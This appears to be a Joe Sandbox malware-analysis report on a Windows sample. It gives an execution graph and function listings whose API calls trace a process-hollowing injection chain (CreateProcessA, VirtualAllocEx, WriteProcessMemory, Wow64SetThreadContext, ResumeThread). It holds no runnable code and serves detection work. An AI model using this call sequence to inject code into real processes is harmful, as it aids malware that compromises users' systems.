                        execution_graph 21097 2d0d690 DuplicateHandle 21098 2d0d726 21097->21098 21099 2d0acb0 21102 2d0ada8 21099->21102 21100 2d0acbf 21103 2d0adb9 21102->21103 21104 2d0addc 21102->21104 21103->21104 21110 2d0b040 21103->21110 21114 2d0b031 21103->21114 21104->21100 21105 2d0add4 21105->21104 21106 2d0afe0 GetModuleHandleW 21105->21106 21107 2d0b00d 21106->21107 21107->21100 21111 2d0b054 21110->21111 21112 2d0b079 21111->21112 21118 2d0a130 21111->21118 21112->21105 21115 2d0b054 21114->21115 21116 2d0a130 LoadLibraryExW 21115->21116 21117 2d0b079 21115->21117 21116->21117 21117->21105 21119 2d0b220 LoadLibraryExW 21118->21119 21121 2d0b299 21119->21121 21121->21112 21288 2d0d040 21289 2d0d086 GetCurrentProcess 21288->21289 21291 2d0d0d1 21289->21291 21292 2d0d0d8 GetCurrentThread 21289->21292 21291->21292 21293 2d0d115 GetCurrentProcess 21292->21293 21294 2d0d10e 21292->21294 21295 2d0d14b 21293->21295 21294->21293 21296 2d0d173 GetCurrentThreadId 21295->21296 21297 2d0d1a4 21296->21297 21122 4f11df3 21123 4f12025 21122->21123 21124 4f11dfd 21122->21124 21128 4f14cc6 21124->21128 21144 4f14c58 21124->21144 21159 4f14c68 21124->21159 21129 4f14c54 21128->21129 21131 4f14cc9 21128->21131 21130 4f14ca6 21129->21130 21174 4f1527e 21129->21174 21181 4f1539f 21129->21181 21189 4f1531d 21129->21189 21194 4f15470 21129->21194 21198 4f158b0 21129->21198 21203 4f154ac 21129->21203 21208 4f150aa 21129->21208 21213 4f151a5 21129->21213 21218 4f156c2 21129->21218 21223 4f15a20 21129->21223 21227 4f15441 21129->21227 21232 4f1541e 21129->21232 21130->21123 21131->21123 21145 4f14c82 21144->21145 21146 4f158b0 2 API calls 21145->21146 21147 4f15470 2 API calls 21145->21147 21148 4f1531d 2 API calls 21145->21148 21149 4f1539f 2 API calls 21145->21149 21150 4f1527e 4 API calls 21145->21150 21151 4f1541e 2 API calls 21145->21151 21152 4f15441 2 API calls 21145->21152 21153 4f15a20 2 API calls 21145->21153 21154 4f156c2 2 API calls 21145->21154 21155 4f151a5 2 API calls 21145->21155 21156 4f150aa 2 API calls 21145->21156 21157 4f14ca6 21145->21157 21158 4f154ac 2 API calls 21145->21158 21146->21157 21147->21157 21148->21157 21149->21157 21150->21157 21151->21157 21152->21157 21153->21157 21154->21157 21155->21157 21156->21157 21157->21123 21158->21157 21160 4f14c82 21159->21160 21161 4f158b0 2 API calls 21160->21161 21162 4f15470 2 API calls 21160->21162 21163 4f1531d 2 API calls 21160->21163 21164 4f1539f 2 API calls 21160->21164 21165 4f1527e 4 API calls 21160->21165 21166 4f1541e 2 API calls 21160->21166 21167 4f15441 2 API calls 21160->21167 21168 4f15a20 2 API calls 21160->21168 21169 4f156c2 2 API calls 21160->21169 21170 4f151a5 2 API calls 21160->21170 21171 4f150aa 2 API calls 21160->21171 21172 4f14ca6 21160->21172 21173 4f154ac 2 API calls 21160->21173 21161->21172 21162->21172 21163->21172 21164->21172 21165->21172 21166->21172 21167->21172 21168->21172 21169->21172 21170->21172 21171->21172 21172->21123 21173->21172 21240 4f117b0 21174->21240 21244 4f117a8 21174->21244 21175 4f151b1 21176 4f15749 21175->21176 21248 4f116c0 21175->21248 21252 4f116b8 21175->21252 21176->21130 21182 4f153a5 21181->21182 21185 4f116c0 WriteProcessMemory 21182->21185 21186 4f116b8 WriteProcessMemory 21182->21186 21183 4f151b1 21184 4f1557f 21183->21184 21187 4f116c0 WriteProcessMemory 21183->21187 21188 4f116b8 WriteProcessMemory 21183->21188 21184->21130 21185->21183 21186->21183 21187->21183 21188->21183 21190 4f15326 21189->21190 21256 4f11040 21190->21256 21260 4f11038 21190->21260 21191 4f15380 21264 4f110f0 21194->21264 21268 4f110ea 21194->21268 21195 4f1548a 21199 4f15959 21198->21199 21201 4f110f0 Wow64SetThreadContext 21199->21201 21202 4f110ea Wow64SetThreadContext 21199->21202 21200 4f15974 21201->21200 21202->21200 21204 4f15469 21203->21204 21272 4f11600 21204->21272 21276 4f115f9 21204->21276 21205 4f15adc 21209 4f150b0 21208->21209 21280 4f11948 21209->21280 21284 4f1193c 21209->21284 21214 4f151b1 21213->21214 21215 4f15787 21214->21215 21216 4f116c0 WriteProcessMemory 21214->21216 21217 4f116b8 WriteProcessMemory 21214->21217 21215->21130 21216->21214 21217->21214 21219 4f15abe 21218->21219 21221 4f11600 VirtualAllocEx 21219->21221 21222 4f115f9 VirtualAllocEx 21219->21222 21220 4f15adc 21221->21220 21222->21220 21225 4f116c0 WriteProcessMemory 21223->21225 21226 4f116b8 WriteProcessMemory 21223->21226 21224 4f15a44 21225->21224 21226->21224 21228 4f15447 21227->21228 21230 4f11600 VirtualAllocEx 21228->21230 21231 4f115f9 VirtualAllocEx 21228->21231 21229 4f15adc 21230->21229 21231->21229 21233 4f153b6 21232->21233 21234 4f151b1 21232->21234 21236 4f116c0 WriteProcessMemory 21233->21236 21237 4f116b8 WriteProcessMemory 21233->21237 21235 4f1557f 21234->21235 21238 4f116c0 WriteProcessMemory 21234->21238 21239 4f116b8 WriteProcessMemory 21234->21239 21235->21130 21236->21234 21237->21234 21238->21234 21239->21234 21241 4f117fb ReadProcessMemory 21240->21241 21243 4f1183f 21241->21243 21243->21175 21245 4f117fb ReadProcessMemory 21244->21245 21247 4f1183f 21245->21247 21247->21175 21249 4f11708 WriteProcessMemory 21248->21249 21251 4f1175f 21249->21251 21251->21175 21253 4f11708 WriteProcessMemory 21252->21253 21255 4f1175f 21253->21255 21255->21175 21257 4f11080 ResumeThread 21256->21257 21259 4f110b1 21257->21259 21259->21191 21261 4f11080 ResumeThread 21260->21261 21263 4f110b1 21261->21263 21263->21191 21265 4f11135 Wow64SetThreadContext 21264->21265 21267 4f1117d 21265->21267 21267->21195 21269 4f11135 Wow64SetThreadContext 21268->21269 21271 4f1117d 21269->21271 21271->21195 21273 4f11640 VirtualAllocEx 21272->21273 21275 4f1167d 21273->21275 21275->21205 21277 4f11640 VirtualAllocEx 21276->21277 21279 4f1167d 21277->21279 21279->21205 21281 4f119d1 CreateProcessA 21280->21281 21283 4f11b93 21281->21283 21285 4f119d1 CreateProcessA 21284->21285 21287 4f11b93 21285->21287 21298 2d04668 21299 2d0467a 21298->21299 21300 2d04686 21299->21300 21302 2d04779 21299->21302 21303 2d0479d 21302->21303 21307 2d04888 21303->21307 21311 2d04879 21303->21311 21309 2d048af 21307->21309 21308 2d0498c 21309->21308 21315 2d044c4 21309->21315 21313 2d048af 21311->21313 21312 2d0498c 21312->21312 21313->21312 21314 2d044c4 CreateActCtxA 21313->21314 21314->21312 21316 2d05918 CreateActCtxA 21315->21316 21318 2d059db 21316->21318 21319 4f15f08 21320 4f16093 21319->21320 21322 4f15f2e 21319->21322 21322->21320 21323 4f14430 21322->21323 21324 4f16188 PostMessageW 21323->21324 21325 4f161f4 21324->21325 21325->21322

                        Executed Functions

                        Function 04F16C6B Relevance: .4, Instructions: 404COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4a894a049c820b0a8288a96de35623b374c23ea9100b30d2e63092bd17681fc
                        • Instruction ID: fdcbc0198fa2ef2142eb0fd0a4a6ff650e46d23a4f35b75458c3831ab20407ab
                        • Opcode Fuzzy Hash: f4a894a049c820b0a8288a96de35623b374c23ea9100b30d2e63092bd17681fc
                        • Instruction Fuzzy Hash: 4CE18C71B013048FEB19DB65C4A0BAE77FAAF89704F54846DD14ADB3A0DB35E902CB61
                        Function 04F1531D Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d839ab674b8653f621150267864be1bef47514e7d0783c0b2978a5685253107
                        • Instruction ID: f0c85facafaa379cd2f27989c13e07f777adbcd12d815bb2cc300a7be3cd6842
                        • Opcode Fuzzy Hash: 9d839ab674b8653f621150267864be1bef47514e7d0783c0b2978a5685253107
                        • Instruction Fuzzy Hash: 8A110D39D19118EFCB64CF64C8447F8BBB4AB99311F40A0DAD00AA7261EF346A86DF50
                        Function 04F1569A Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 049d887baa62fcb844fab46487ddebbec1d08b1c93638548ce0f39abfc3a77b7
                        • Instruction ID: 545a623812bb7abd29cc6dd1e37b15c40fa82b8024fdd2fece2f2be738f41891
                        • Opcode Fuzzy Hash: 049d887baa62fcb844fab46487ddebbec1d08b1c93638548ce0f39abfc3a77b7
                        • Instruction Fuzzy Hash: D1F04F3594E144EFCB11CF6094946F8BFB8A796355F0070DA840AA7172EA346A86DB21
                        Function 04F157CD Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 192a01628dc0a3baa35fccd9325d157faa93259cabf02ec07ac61faf630bd716
                        • Instruction ID: 7bef09327c85f7979b55b75755de65f28baa115a53eaa56993232ed4dfac10ad
                        • Opcode Fuzzy Hash: 192a01628dc0a3baa35fccd9325d157faa93259cabf02ec07ac61faf630bd716
                        • Instruction Fuzzy Hash: 62E01235D4E144EFCB10CF5484844F4FFB8AB9A300F0570EA944A57232DE3065469B25
                        Function 04F15B21 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee91010fb3763c2187443058fdf6be4d1949094c3a3de3610d02eeaf8c983ad7
                        • Instruction ID: 9a5929f97b5473093c94a6eca0c5c3e9946325d32dbbeb7d02a4314db53e87ee
                        • Opcode Fuzzy Hash: ee91010fb3763c2187443058fdf6be4d1949094c3a3de3610d02eeaf8c983ad7
                        • Instruction Fuzzy Hash: 0FD0C975E4E104EFCF50AFB094952F4FAF8A76B315F0470DA940AA7221EA31A9429B19
                        Function 02D0D031 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 294 2d0d031-2d0d0cf GetCurrentProcess 298 2d0d0d1-2d0d0d7 294->298 299 2d0d0d8-2d0d10c GetCurrentThread 294->299 298->299 300 2d0d115-2d0d149 GetCurrentProcess 299->300 301 2d0d10e-2d0d114 299->301 303 2d0d152-2d0d16d call 2d0d618 300->303 304 2d0d14b-2d0d151 300->304 301->300 306 2d0d173-2d0d1a2 GetCurrentThreadId 303->306 304->303 308 2d0d1a4-2d0d1aa 306->308 309 2d0d1ab-2d0d20d 306->309 308->309
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 02D0D0BE
                        • GetCurrentThread.KERNEL32 ref: 02D0D0FB
                        • GetCurrentProcess.KERNEL32 ref: 02D0D138
                        • GetCurrentThreadId.KERNEL32 ref: 02D0D191
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 3cbede03560f00f1e321bcdc1ba513d4e61707bb077c2d8834f7edd7a15d422f
                        • Instruction ID: fbac1b5fd6ad474aa55d9dccad0fc3902a70be3f9450b6714ffdd6fbcc7014ec
                        • Opcode Fuzzy Hash: 3cbede03560f00f1e321bcdc1ba513d4e61707bb077c2d8834f7edd7a15d422f
                        • Instruction Fuzzy Hash: 9C5158B09003498FDB14DFA9D588BDEBFF2EF48314F24845AE409A73A0DB345985CB69
                        Function 02D0D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 316 2d0d040-2d0d0cf GetCurrentProcess 320 2d0d0d1-2d0d0d7 316->320 321 2d0d0d8-2d0d10c GetCurrentThread 316->321 320->321 322 2d0d115-2d0d149 GetCurrentProcess 321->322 323 2d0d10e-2d0d114 321->323 325 2d0d152-2d0d16d call 2d0d618 322->325 326 2d0d14b-2d0d151 322->326 323->322 328 2d0d173-2d0d1a2 GetCurrentThreadId 325->328 326->325 330 2d0d1a4-2d0d1aa 328->330 331 2d0d1ab-2d0d20d 328->331 330->331
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 02D0D0BE
                        • GetCurrentThread.KERNEL32 ref: 02D0D0FB
                        • GetCurrentProcess.KERNEL32 ref: 02D0D138
                        • GetCurrentThreadId.KERNEL32 ref: 02D0D191
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: f09668429fdca061b3314138a519ef4931497c483735146a06de79a3e50be05e
                        • Instruction ID: efddb7730cb0884d8aa4d699a5406cec01eac8f81fcb0455c28869f29349c9fa
                        • Opcode Fuzzy Hash: f09668429fdca061b3314138a519ef4931497c483735146a06de79a3e50be05e
                        • Instruction Fuzzy Hash: 9F5139B09003498FDB14DFA9D549BDEBFF2EF48314F20845AE419A73A0DB745944CB69
                        Function 04F1193C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 433 4f1193c-4f119dd 435 4f11a16-4f11a36 433->435 436 4f119df-4f119e9 433->436 441 4f11a38-4f11a42 435->441 442 4f11a6f-4f11a9e 435->442 436->435 437 4f119eb-4f119ed 436->437 439 4f11a10-4f11a13 437->439 440 4f119ef-4f119f9 437->440 439->435 443 4f119fb 440->443 444 4f119fd-4f11a0c 440->444 441->442 445 4f11a44-4f11a46 441->445 452 4f11aa0-4f11aaa 442->452 453 4f11ad7-4f11b91 CreateProcessA 442->453 443->444 444->444 446 4f11a0e 444->446 447 4f11a69-4f11a6c 445->447 448 4f11a48-4f11a52 445->448 446->439 447->442 450 4f11a54 448->450 451 4f11a56-4f11a65 448->451 450->451 451->451 454 4f11a67 451->454 452->453 455 4f11aac-4f11aae 452->455 464 4f11b93-4f11b99 453->464 465 4f11b9a-4f11c20 453->465 454->447 456 4f11ad1-4f11ad4 455->456 457 4f11ab0-4f11aba 455->457 456->453 459 4f11abc 457->459 460 4f11abe-4f11acd 457->460 459->460 460->460 461 4f11acf 460->461 461->456 464->465 475 4f11c30-4f11c34 465->475 476 4f11c22-4f11c26 465->476 478 4f11c44-4f11c48 475->478 479 4f11c36-4f11c3a 475->479 476->475 477 4f11c28 476->477 477->475 480 4f11c58-4f11c5c 478->480 481 4f11c4a-4f11c4e 478->481 479->478 482 4f11c3c 479->482 484 4f11c6e-4f11c75 480->484 485 4f11c5e-4f11c64 480->485 481->480 483 4f11c50 481->483 482->478 483->480 486 4f11c77-4f11c86 484->486 487 4f11c8c 484->487 485->484 486->487 489 4f11c8d 487->489 489->489
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04F11B7E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 5cf25c631dbdf14b7f75dd038c167517334f4f6a73e3c5b794faccf8c9393d1a
                        • Instruction ID: 2b1cf6bbda216ceccd7907c3c7cf35400287cf02461d83314298f6da04cd8633
                        • Opcode Fuzzy Hash: 5cf25c631dbdf14b7f75dd038c167517334f4f6a73e3c5b794faccf8c9393d1a
                        • Instruction Fuzzy Hash: 5BA17C71D00659CFEB24CF68C9407EDBBB2FF48314F14856AD909A7290DB74A986CF92
                        Function 04F11948 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 490 4f11948-4f119dd 492 4f11a16-4f11a36 490->492 493 4f119df-4f119e9 490->493 498 4f11a38-4f11a42 492->498 499 4f11a6f-4f11a9e 492->499 493->492 494 4f119eb-4f119ed 493->494 496 4f11a10-4f11a13 494->496 497 4f119ef-4f119f9 494->497 496->492 500 4f119fb 497->500 501 4f119fd-4f11a0c 497->501 498->499 502 4f11a44-4f11a46 498->502 509 4f11aa0-4f11aaa 499->509 510 4f11ad7-4f11b91 CreateProcessA 499->510 500->501 501->501 503 4f11a0e 501->503 504 4f11a69-4f11a6c 502->504 505 4f11a48-4f11a52 502->505 503->496 504->499 507 4f11a54 505->507 508 4f11a56-4f11a65 505->508 507->508 508->508 511 4f11a67 508->511 509->510 512 4f11aac-4f11aae 509->512 521 4f11b93-4f11b99 510->521 522 4f11b9a-4f11c20 510->522 511->504 513 4f11ad1-4f11ad4 512->513 514 4f11ab0-4f11aba 512->514 513->510 516 4f11abc 514->516 517 4f11abe-4f11acd 514->517 516->517 517->517 518 4f11acf 517->518 518->513 521->522 532 4f11c30-4f11c34 522->532 533 4f11c22-4f11c26 522->533 535 4f11c44-4f11c48 532->535 536 4f11c36-4f11c3a 532->536 533->532 534 4f11c28 533->534 534->532 537 4f11c58-4f11c5c 535->537 538 4f11c4a-4f11c4e 535->538 536->535 539 4f11c3c 536->539 541 4f11c6e-4f11c75 537->541 542 4f11c5e-4f11c64 537->542 538->537 540 4f11c50 538->540 539->535 540->537 543 4f11c77-4f11c86 541->543 544 4f11c8c 541->544 542->541 543->544 546 4f11c8d 544->546 546->546
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04F11B7E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: f563603c92ee53f40a0e30887c06d4fed35d1143a89fcf3fcaa32ad4ed208add
                        • Instruction ID: 27d69b81cd110b3c7edcbcf5f81a33ed00c099199af036ecf45ef4d23f48e971
                        • Opcode Fuzzy Hash: f563603c92ee53f40a0e30887c06d4fed35d1143a89fcf3fcaa32ad4ed208add
                        • Instruction Fuzzy Hash: F3919C71D00259CFEB20CF68C940BDDBBB2FF48314F14816AD909A7290DB70A982CF92
                        Function 02D0ADA8 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 547 2d0ada8-2d0adb7 548 2d0ade3-2d0ade7 547->548 549 2d0adb9-2d0adc6 call 2d0a0cc 547->549 551 2d0ade9-2d0adf3 548->551 552 2d0adfb-2d0ae3c 548->552 556 2d0adc8 549->556 557 2d0addc 549->557 551->552 558 2d0ae49-2d0ae57 552->558 559 2d0ae3e-2d0ae46 552->559 604 2d0adce call 2d0b040 556->604 605 2d0adce call 2d0b031 556->605 557->548 560 2d0ae59-2d0ae5e 558->560 561 2d0ae7b-2d0ae7d 558->561 559->558 563 2d0ae60-2d0ae67 call 2d0a0d8 560->563 564 2d0ae69 560->564 566 2d0ae80-2d0ae87 561->566 562 2d0add4-2d0add6 562->557 565 2d0af18-2d0af94 562->565 570 2d0ae6b-2d0ae79 563->570 564->570 597 2d0afc0-2d0afd8 565->597 598 2d0af96-2d0afbe 565->598 567 2d0ae94-2d0ae9b 566->567 568 2d0ae89-2d0ae91 566->568 571 2d0aea8-2d0aeaa call 2d0a0e8 567->571 572 2d0ae9d-2d0aea5 567->572 568->567 570->566 576 2d0aeaf-2d0aeb1 571->576 572->571 578 2d0aeb3-2d0aebb 576->578 579 2d0aebe-2d0aec3 576->579 578->579 580 2d0aee1-2d0aeee 579->580 581 2d0aec5-2d0aecc 579->581 587 2d0aef0-2d0af0e 580->587 588 2d0af11-2d0af17 580->588 581->580 583 2d0aece-2d0aede call 2d0a0f8 call 2d0a108 581->583 583->580 587->588 599 2d0afe0-2d0b00b GetModuleHandleW 597->599 600 2d0afda-2d0afdd 597->600 598->597 601 2d0b014-2d0b028 599->601 602 2d0b00d-2d0b013 599->602 600->599 602->601 604->562 605->562
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 02D0AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 41cdcf6d441f7bd8f72560411b7815ee4c386a259626d8ccabe4e1f282eeb846
                        • Instruction ID: 197f7f5b56079209116daab055a5db920d62f84e721b9ce5f0d3e8f04c78686d
                        • Opcode Fuzzy Hash: 41cdcf6d441f7bd8f72560411b7815ee4c386a259626d8ccabe4e1f282eeb846
                        • Instruction Fuzzy Hash: 54813870A00B058FD724DF69D49579ABBF1FF48304F108A2ED58A97B90D775E84ACB90
                        Function 02D044C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 606 2d044c4-2d059d9 CreateActCtxA 609 2d059e2-2d05a3c 606->609 610 2d059db-2d059e1 606->610 617 2d05a4b-2d05a4f 609->617 618 2d05a3e-2d05a41 609->618 610->609 619 2d05a60-2d05a90 617->619 620 2d05a51-2d05a5d 617->620 618->617 624 2d05a42-2d05a47 619->624 625 2d05a92-2d05b14 619->625 620->619 624->617
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02D059C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 8dccf05100cd25ca485a12cd88c971b1f94a5ced2cad1d594dfedb9992e4f06b
                        • Instruction ID: 9df7ae3001d8f05d16f8a9c34a27840f9a59a5a04feaaab8758504935f0bbac3
                        • Opcode Fuzzy Hash: 8dccf05100cd25ca485a12cd88c971b1f94a5ced2cad1d594dfedb9992e4f06b
                        • Instruction Fuzzy Hash: 2C41D2B0C00719CADB24DFA9D884BDEBBB5BF49304F60805AD809AB251DB75694ACF90
                        Function 02D0590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 628 2d0590c-2d059d9 CreateActCtxA 630 2d059e2-2d05a3c 628->630 631 2d059db-2d059e1 628->631 638 2d05a4b-2d05a4f 630->638 639 2d05a3e-2d05a41 630->639 631->630 640 2d05a60-2d05a90 638->640 641 2d05a51-2d05a5d 638->641 639->638 645 2d05a42-2d05a47 640->645 646 2d05a92-2d05b14 640->646 641->640 645->638
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02D059C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: fc97b4f6c3992711b0cf7fc22719cd90a0317117373817e634fa176c4ff79c73
                        • Instruction ID: 33aa8321794699c1a67ae51cb92fccf872d06831e48eef595d9769f0ddf11177
                        • Opcode Fuzzy Hash: fc97b4f6c3992711b0cf7fc22719cd90a0317117373817e634fa176c4ff79c73
                        • Instruction Fuzzy Hash: 5C41E5B0C00719CFDB24DFA9D8847DDBBB5BF45304F60806AD409AB255DB75694ACF50
                        Function 04F116B8 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 649 4f116b8-4f1170e 651 4f11710-4f1171c 649->651 652 4f1171e-4f1175d WriteProcessMemory 649->652 651->652 654 4f11766-4f11796 652->654 655 4f1175f-4f11765 652->655 655->654
                        APIs
                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04F11750
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 3aae3fb2de585d49f14609c469f9c6d60b982f9a73f71960d51413c162fea19b
                        • Instruction ID: c27950329bec66020cae606116d6f8986c781db58cd15b9363ba6c979eacb48b
                        • Opcode Fuzzy Hash: 3aae3fb2de585d49f14609c469f9c6d60b982f9a73f71960d51413c162fea19b
                        • Instruction Fuzzy Hash: 222124B59003098FDB10CFA9C9857DEBBF1BF48310F10842AE919A7251D7789A45DB60
                        Function 04F116C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 659 4f116c0-4f1170e 661 4f11710-4f1171c 659->661 662 4f1171e-4f1175d WriteProcessMemory 659->662 661->662 664 4f11766-4f11796 662->664 665 4f1175f-4f11765 662->665 665->664
                        APIs
                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04F11750
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 4229c06fd4c7b3124420879f60636496e591536fc38b5db7ee409ea9efa06faa
                        • Instruction ID: 0347dc84bda6400d7f32dbf8793f9e78ffcbc56483349b0d50b03fa283678e75
                        • Opcode Fuzzy Hash: 4229c06fd4c7b3124420879f60636496e591536fc38b5db7ee409ea9efa06faa
                        • Instruction Fuzzy Hash: 202157B19003099FDB10DFA9C885BDEBBF5FF48310F108429E919A7341C778A945CBA4
                        Function 04F117A8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 669 4f117a8-4f1183d ReadProcessMemory 672 4f11846-4f11876 669->672 673 4f1183f-4f11845 669->673 673->672
                        APIs
                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 04F11830
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: fb61d8a09b215ac832d482dce748a31623f0680d141a7a6d06547b880b890012
                        • Instruction ID: ffa8df2314f5b759dcbc8d8786f6352a4dfa99215bd7cb9e9dc5165a10b267f6
                        • Opcode Fuzzy Hash: fb61d8a09b215ac832d482dce748a31623f0680d141a7a6d06547b880b890012
                        • Instruction Fuzzy Hash: FB2125B1C003098FDB10DFA9C9857EEBBF5FF48320F10842AE919A7251D7349945DBA1
                        Function 04F110EA Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                        Download Yara Rule

